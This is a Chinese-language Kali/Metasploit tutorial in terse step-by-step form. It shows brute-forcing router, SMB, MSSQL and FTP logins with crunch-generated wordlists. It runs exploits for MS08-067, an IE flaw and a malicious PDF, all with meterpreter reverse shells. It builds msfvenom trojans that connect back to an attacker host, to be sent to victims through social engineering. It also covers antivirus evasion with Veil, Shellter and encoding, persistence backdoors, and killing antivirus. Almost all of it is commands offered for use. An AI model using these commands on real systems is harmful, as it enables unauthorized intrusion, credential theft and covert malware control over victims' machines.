玩转Kali 2.0
Metasploit破解路由器密码
步骤:寻找渗透目标;制作密码字典;进行密码破解;进入路由器。
- ie输入192.168.1.1
可以看到输入用户名密码的弹出窗口 - crunch
crunch 3 4 1234567890 -o user.lst #生成3-4位的0-9的密码。
crunch 8 8 -l 19@@0728 -o user.lst #生成8位的包含19**0728的密码 - 启动Metasploit
msfconsole
use auxiliary/scanner/http/http_login
show options
set rhosts 192.168.1.1
set rport 80
set username admin
set pass_file /root/ps.lst
设置完毕以后show options,查看参数设置是否成功,没有问题后执行:
exploit
然后开始暴力破解。
4.破解成功
Metasploit破解指定服务器密码
步骤:寻找渗透目标;制作密码字典;进行密码破解;成功拿到服务器权限。
- windows 2003系统作为目标
启动msf
检查当前局域网环境下存活的主机
msf > use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.1.100/24
set threads 50
exploit
能找到存活主机
msf > use auxiliary/scanner/smb/smb_version
set rhosts 192.168.1.100
set threads 50
exploit
操作系统版本收集,信息收集阶段完成 - 制作字典
crunch - 破解
msf > use auxiliary/scanner/smb/smb_login
set rhosts 192.168.43.158
set threads 50
set pass_file /root/pass.txt
exploit - 拿到服务器权限
打开远程桌面,用刚才破解到的密码登陆
Metasploit破解mssql密码
步骤:收集目标;制作字典;进行密码破解。
- 收集目标
搭建了一个windows 2003,安装了mssql 2000数据库。
用以上教程,扫描当前存活主机,收集操作系统版本。
msf > use auxiliary/scanner/discovery/arp_sweep
网络扫描,选取一个作为目标
msf > use auxiliary/scanner/portscan/syn
端口探测,检测到打开了1433端口
msf > use auxiliary/scanner/smb/smb_version
扫描主机名称,操作系统,版本 - 制作字典
crunch - 进行密码破解
msf > use auxiliary/scanner/mssql/mssql_login
show options
set rhosts
set rport
set username sa
set pass_file /root/ps.lst
set theards 50
Metasploit破解ftp密码
步骤:寻找目标;制作字典;进行破解。
- 收集目标
参考以上内容 - 制作字典
- 参考以上内容
- 进行破解
use auxiliary/scanner/ftp/ftp_version #检测版本
use auxiliary/scanner/ftp/anonymous #测试是否支持匿名登陆
use auxiliary/scanner/ftp/ftp_login #破解
set rhosts 192.168.1.100
set rport 21
set username admin
set pass_file /root/ps.lst
exploit
Metasploit系列简单教程
ms08_067示例
msf>use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
可以使用info命令查看漏洞的信息
run开始攻击
浏览器漏洞ms10_018
msf>use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
show targets
快捷方式漏洞ms10_046
PDF漏洞利用
CVE-2010-2883
use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
生成pdf文件让客户端打开。
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
爆破模块
生成木马
当不存在漏洞的时候可以通过社会工程学,把生成的木马发送给对方。
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率。利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
msfvenom也可以多次编码,也可以捆绑其他软件。
upx可以对程序进行再次加壳,压缩。
veil 免杀生成木马
配合msf连接被控制端。
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f exe > /root/test.exe
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f jar > /root/text.jar
生成test.exe和java.jar木马
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
这里payload不一样
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > run
免杀
veil
veil-evesion 基于msf负载模块生成exe,也需要msf 侦听。
shellter 捆绑工具
免杀有2种办法,可以用捆绑,可以用多次编码。
捆绑,shellter,可以将上面生成的木马捆绑到正常的exe当中。
维持访问
在meterpreter下面执行run persistence 可以设置后门在系统启动、用户登录时执行。
维持访问。即使删除掉源文件也可以。
run persistence -h 查看帮助。
设置完毕以后需要重启。
run scheduleme
持续性后门
run kill av 关闭杀毒软件
run